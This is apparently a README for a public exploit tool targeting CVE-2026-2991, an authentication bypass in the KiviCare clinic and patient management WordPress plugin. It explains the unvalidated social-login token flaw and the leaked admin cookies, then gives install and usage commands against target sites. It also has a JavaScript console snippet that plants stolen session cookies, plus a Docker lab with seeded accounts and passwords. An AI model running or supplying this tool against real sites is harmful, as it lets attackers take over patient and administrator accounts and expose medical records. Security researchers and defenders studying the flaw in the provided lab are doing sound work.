Share
## https://sploitus.com/exploit?id=2A12F1C7-0C59-588B-9C6C-F6F214079DEF
KiviCare 


    
    
      
    


## ๐Ÿ“œ Description

CVE-2026-2991 is an authentication bypass vulnerability in the **KiviCare โ€“ Clinic & Patient Management System (EHR)** WordPress plugin affecting all versions up to and including **4.1.2**.

The plugin exposes a public REST endpoint at `/wp-json/kivicare/v1/auth/patient/social-login` that authenticates users via social login. The `patientSocialLogin()` function accepts an email address and an access token but **never validates the token against the claimed social provider**. Any unauthenticated attacker can log in as any registered patient by supplying only their email and an arbitrary string as the token.

Additionally, WordPress authentication cookies are issued **before** the patient-role check is enforced. This means that for non-patient accounts (including administrators), the response returns HTTP 403 but still includes valid `Set-Cookie` headers โ€” leaking a replayable admin session to the attacker.

**Affected versions:** kivicare-clinic-management-system 
## OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```

## Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
```


## โš™๏ธ Usage

```
python3 CVE-2026-2991.py --url  --email  [--login-type ] [--timeout ] [--useragent ]
```

---

### Patient account takeover

Bypass authentication for a registered patient. The script returns their full session, including a nonce and replayable cookies.

```bash
python3 CVE-2026-2991.py --url 'https://target.com' --email 'patient@target.com'
```

![Patient bypass](assets/patient.jpg)

---

### Admin session leak (non-patient account)

Supply the email of any non-patient user (e.g. an administrator). The endpoint issues valid auth cookies before the role check and returns 403 โ€” those cookies are extracted and printed.

```bash
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email 'admin@example.com'
```

![Admin cookie leak](assets/admin.jpg)

---

### Browser console login

After a successful run the script prints a JavaScript snippet. Open the target site in your browser, paste the snippet into the browser console (`F12 โ†’ Console`), and press Enter โ€” it sets the stolen cookies and navigates you to the dashboard automatically.

```js
(() => {
  document.cookie = "wordpress_=; path=/";
  document.cookie = "wordpress_logged_in_=; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();
```

## ๐Ÿ‹ Docker PoC

A self-contained Docker Compose environment with the vulnerable plugin pre-installed and seeded with realistic test data.
Check [DOCKER.md](/docker/DOCKER.md) for more details.

```bash
cd docker/
docker compose up
```

The lab seeds the following accounts on first boot:

| Role      | Username        | Email                            | Password     |
|-----------|-----------------|----------------------------------|--------------|
| Admin     | admin           | admin@example.com                | admin        |
| Doctor    | dr.harris       | dr.harris@greenfield.test        | Doctor@123   |
| Doctor    | dr.chen         | dr.chen@greenfield.test          | Doctor@123   |
| Doctor    | dr.okonkwo      | dr.okonkwo@greenfield.test       | Doctor@123   |
| Patient   | james.ford      | james.ford@patients.test         | Patient@123  |
| Patient   | sofia.reyes     | sofia.reyes@patients.test        | Patient@123  |
| Patient   | oliver.knight   | oliver.knight@patients.test      | Patient@123  |
| Patient   | amara.diallo    | amara.diallo@patients.test       | Patient@123  |
| Patient   | dan.walsh       | dan.walsh@patients.test          | Patient@123  |

```bash
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email 'sofia.reyes@patients.test'

# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email 'admin@example.com'
```

## ๐Ÿ•ต๐Ÿผ References

- [KiviCare โ€” WordPress Plugin](https://wordpress.org/plugins/kivicare-clinic-management-system/)
- [NVD โ€” CVE-2026-2991](https://nvd.nist.gov/vuln/detail/CVE-2026-2991)
- [WordFence](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kivicare-clinic-management-system/)
- [HackIndex.io โ€” CVE-2026-2991](https://hackindex.io/vulnerabilities/CVE-2026-2991)

## ๐Ÿ“ข Disclaimer

This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by this tool.